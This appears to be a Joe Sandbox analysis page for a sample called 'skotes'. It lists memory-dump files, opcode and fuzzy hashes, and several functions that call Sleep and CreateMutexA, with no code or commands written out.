Source File: 00000002.00000002.1732633839.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.1732564170.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732633839.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732693634.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732706424.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732720681.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732733544.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732746790.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732836871.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732857227.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732874870.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732887434.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732899950.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732899950.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732937641.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732952071.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732965883.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732978646.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733004973.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733019299.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733056403.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733104350.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733283750.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733296990.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733327887.0000000000B70000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733376160.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733449133.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733521278.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733551502.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733565403.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733591961.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733668382.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733711343.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733725448.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733801787.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733819836.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733837527.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733855671.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733870196.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733886712.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733906035.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733925064.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733942500.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733959277.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733978232.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733995446.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734013456.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734027180.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734027180.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734205050.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734227506.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734245529.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734263856.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734280289.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734299274.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734314422.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 5cb24e7613764dd7b66d3056b3a55acf98c0446930556b01af527806987ad1ab
Instruction ID: 631519c627cf847e2e66bf2abb1cd7ce4c0bba3b1c6bd90dfe0efef62a203dd1
Opcode Fuzzy Hash: 5cb24e7613764dd7b66d3056b3a55acf98c0446930556b01af527806987ad1ab
Instruction Fuzzy Hash: 0A316831B002018BEB08EBB9DDDDB6DB766EFC5311F208318E9549B3D6C77549888B5A

Function 0095A54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0095A963
CreateMutexA.KERNELBASE(00000000,00000000,009B3254), ref: 0095A981

Memory Dump Source

Source File: 00000002.00000002.1732633839.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.1732564170.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732633839.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732693634.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732706424.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732720681.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732733544.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732746790.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732836871.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732857227.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732874870.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732887434.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732899950.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732899950.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732937641.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732952071.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732965883.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732978646.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733004973.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733019299.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733056403.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733104350.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733283750.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733296990.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733327887.0000000000B70000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733376160.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733449133.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733521278.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733551502.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733565403.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733591961.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733668382.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733711343.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733725448.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733801787.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733819836.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733837527.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733855671.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733870196.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733886712.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733906035.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733925064.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733942500.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733959277.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733978232.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733995446.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734013456.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734027180.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734027180.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734205050.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734227506.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734245529.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734263856.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734280289.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734299274.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734314422.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 97d245599f121ee9177d29fe8ab10a776dd398383d6835fceabc3aee02217ce2
Instruction ID: 412f4c58446f2d25ed5675c06f91701de38087afb836c079ef2d4536d8f7f11f
Opcode Fuzzy Hash: 97d245599f121ee9177d29fe8ab10a776dd398383d6835fceabc3aee02217ce2
Instruction Fuzzy Hash: 9F319B31B012018BEB08DB79DDD9B6DB766EFC5315F248318E9149B3D2D73589888B16

Function 0095A682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0095A963
CreateMutexA.KERNELBASE(00000000,00000000,009B3254), ref: 0095A981

Memory Dump Source

Source File: 00000002.00000002.1732633839.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.1732564170.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732633839.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732693634.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732706424.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732720681.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732733544.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732746790.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732836871.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732857227.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732874870.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732887434.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732899950.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732899950.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732937641.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732952071.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732965883.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732978646.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733004973.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733019299.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733056403.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733104350.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733283750.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733296990.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733327887.0000000000B70000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733376160.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733449133.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733521278.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733551502.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733565403.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733591961.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733668382.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733711343.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733725448.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733801787.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733819836.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733837527.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733855671.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733870196.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733886712.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733906035.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733925064.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733942500.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733959277.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733978232.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733995446.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734013456.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734027180.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734027180.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734205050.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734227506.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734245529.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734263856.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734280289.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734299274.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734314422.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 3f6b161fe6a8519f79c175df992fedcc2616f39edc5bdafe995c090a9287cd67
Instruction ID: cece16759af5c3b234ee4ac56a5f8262c60d70b9922c480cbbad24f9794bce9e
Opcode Fuzzy Hash: 3f6b161fe6a8519f79c175df992fedcc2616f39edc5bdafe995c090a9287cd67
Instruction Fuzzy Hash: 5F317931B012018BEB08DB79DDD976DB776EFC5321F248718E9149B3D2C73589888B5A

Function 00959ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0095A963
CreateMutexA.KERNELBASE(00000000,00000000,009B3254), ref: 0095A981

Memory Dump Source

Source File: 00000002.00000002.1732633839.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.1732564170.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732633839.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732693634.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732706424.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732720681.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732733544.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732746790.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732836871.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732857227.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732874870.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732887434.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732899950.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732899950.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732937641.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732952071.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732965883.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732978646.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733004973.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733019299.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733056403.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733104350.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733283750.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733296990.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733327887.0000000000B70000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733376160.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733449133.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733521278.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733551502.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733565403.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733591961.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733668382.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733711343.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733725448.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733801787.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733819836.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733837527.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733855671.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733870196.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733886712.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733906035.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733925064.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733942500.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733959277.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733978232.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733995446.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734013456.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734027180.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734027180.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734205050.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734227506.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734245529.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734263856.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734280289.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734299274.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1734314422.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: a11c132bd746004901a44fad25b0663888a23f6c6da9b316e8209163b12ad940
Instruction ID: b7656c58cc234d948ca41cca0dbad3e952bbbb59965854d78711d641cefb8d25
Opcode Fuzzy Hash: a11c132bd746004901a44fad25b0663888a23f6c6da9b316e8209163b12ad940
Instruction Fuzzy Hash: 96217931B44201DBEB18DB2DEDD976DB766EBC1311F20431CE9188B2D2C77599848B12

Function 0095A856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0095A963
CreateMutexA.KERNELBASE(00000000,00000000,009B3254), ref: 0095A981

Memory Dump Source

Source File: 00000002.00000002.1732633839.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000002.00000002.1732564170.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732633839.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732693634.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732706424.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732720681.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732733544.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732746790.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732836871.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732857227.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732874870.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732887434.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732899950.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732899950.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732937641.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732952071.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732965883.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1732978646.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733004973.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733019299.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733056403.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733104350.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733283750.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733296990.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733327887.0000000000B70000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733376160.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733449133.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733521278.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733551502.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733565403.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1733591961.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
